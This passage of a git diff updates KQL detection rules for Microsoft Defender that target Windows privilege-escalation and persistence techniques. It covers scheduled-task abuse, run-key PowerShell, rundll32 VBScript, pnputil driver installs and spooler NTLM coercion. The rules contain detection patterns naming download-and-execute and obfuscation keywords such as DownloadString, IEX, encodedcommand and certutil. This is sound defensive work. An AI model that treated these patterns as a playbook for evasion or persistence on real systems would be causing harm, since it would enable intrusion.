-DeviceProcessEvents
+// Title: Suspicious Driver Install by pnputil.exe
+// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+// False Positives:
+// - Pnputil.exe being used may be performed by a system administrator.
+// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
index 9e65730c..fac6cf31 100644
--- a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Get-Variable.exe Creation
-// Author: frack113
-// Date: 2022-04-23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-// WindowsApps is by default in the path where PowerShell is executed.
-// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027
-
-DeviceFileEvents
+// Title: Suspicious Get-Variable.exe Creation
+// Author: frack113
+// Date: 2022-04-23
+// Level: high
+// Description: Get-Variable is a valid PowerShell cmdlet
+// WindowsApps is by default in the path where PowerShell is executed.
+// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
 | where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
index 8e91a9e5..3c376b19 100644
--- a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious GrpConv Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-05-19
-// Level: high
-// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
-
-DeviceProcessEvents
+// Title: Suspicious GrpConv Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-19
+// Level: high
+// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
index a6918cf2..7b2d6fd6 100644
--- a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious GUP Usage
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-02-06
-// Level: high
-// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
-
-DeviceProcessEvents
+// Title: Suspicious GUP Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-06
+// Level: high
+// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater
+
+DeviceProcessEvents
 | where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
index 2e570eeb..0d258bb5 100644
--- a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Modification Of Scheduled Tasks
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-28
-// Level: high
-// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
-// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
-// Instead they modify the task after creation to include their malicious payload
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-
-DeviceProcessEvents
+// Title: Suspicious Modification Of Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
+// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
+// Instead they modify the task after creation to include their malicious payload
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains 
"bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
index 4e57804a..890f936d 100644
--- a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious NTLM Authentication on the Printer Spooler Service
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022-05-04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212
-
-DeviceProcessEvents
+// Title: Suspicious NTLM Authentication on the Printer Spooler Service
+// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
+// Date: 2022-05-04
+// Level: high
+// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
index 03b15421..7f5fb2dc 100644
--- a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Outlook Macro Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: high
-// Description: Detects the creation of a macro file for Outlook.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Suspicious Outlook Macro Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql
index 475966e9..c8a50768 100644
--- a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious PowerShell In Registry Run Keys
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-03-17
-// Level: medium
-// Description: Detects potential PowerShell commands or code within registry run keys
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate admin or third party scripts. Baseline according to your environment
-
-DeviceRegistryEvents
+// Title: Suspicious PowerShell In Registry Run Keys
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects potential PowerShell commands or code within registry run keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate admin or third party scripts. Baseline according to your environment
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey 
contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
index bc2e8ac4..143e8011 100644
--- a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Run Key from Download
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
-// Date: 2019-10-01
-// Level: high
-// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Software installers downloaded and used by users
-
-DeviceRegistryEvents
+// Title: Suspicious Run Key from Download
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Software installers downloaded and used by users
+
+DeviceRegistryEvents
 | where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql
index 31e5d8f5..bc5532ac 100644
--- a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious RunAs-Like Flag Combination
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-11-11
-// Level: medium
-// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation
-
-DeviceProcessEvents
+// Title: Suspicious RunAs-Like Flag Combination
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-11
+// Level: medium
+// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql
index ff0ca567..b46e149a 100644
--- a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Rundll32 Invoking Inline VBScript
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
-
-DeviceProcessEvents
+// Title: Suspicious Rundll32 Invoking Inline VBScript
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql
index b6d74d19..2ed0fc11 100644
--- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Scheduled Task Creation Involving Temp Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
-// False Positives:
-// - Administrative activity
-// - Software installation
-
-DeviceProcessEvents
+// Title: Suspicious Scheduled Task Creation Involving Temp Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-11
+// Level: high
+// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+// False Positives:
+// - Administrative activity
+// - Software installation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
index c3cfc582..0965c137 100644
--- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Scheduled Task Creation via Masqueraded XML File
-// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
-// Date: 2023-04-20
-// Level: medium
-// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005
-
-DeviceProcessEvents
+// Title: Suspicious Scheduled Task Creation via Masqueraded XML File
+// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
+// Date: 2023-04-20
+// Level: medium
+// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql
index 9543dfc3..0d94fa9e 100644
--- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Scheduled Task Name As GUID
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-31
-// Level: medium
-// Description: Detects creation of a scheduled task with a GUID like name
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-// False Positives:
-// - Legitimate software naming their tasks as GUIDs
-
-DeviceProcessEvents
+// Title: Suspicious Scheduled Task Name As GUID
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: medium
+// Description: Detects creation of a scheduled task with a GUID like name
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Legitimate software naming their tasks as GUIDs
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
index 08ba3dcb..42b9d589 100644
--- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Scheduled Task Write to System32 Tasks
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-11-16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053
-
-DeviceFileEvents
+// Title: Suspicious Scheduled Task Write to System32 Tasks
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-16
+// Level: high
+// Description: Detects the creation of tasks from processes executed from suspicious locations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql
index 34be5e01..371ae1d7 100644
--- a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Schtasks Execution AppData Folder
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-03-15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Suspicious Schtasks Execution AppData Folder
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-15
+// Level: high
+// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql
index b0607d5d..766acfaf 100644
--- a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Schtasks Schedule Type With High Privileges
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-31
-// Level: medium
-// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-// False Positives:
-// - Some installers were seen using this method of creation unfortunately. Filter them in your environment
-
-DeviceProcessEvents
+// Title: Suspicious Schtasks Schedule Type With High Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Some installers were seen using this method of creation unfortunately. Filter them in your environment
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql
index 2b840393..8cc509c2 100644
--- a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Schtasks Schedule Types
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-09
-// Level: high
-// Description: Detects scheduled task creations or modification on a suspicious schedule type
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-// False Positives:
-// - Legitimate processes that run at logon. Filter according to your environment
-
-DeviceProcessEvents
+// Title: Suspicious Schtasks Schedule Types
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects scheduled task creations or modification on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
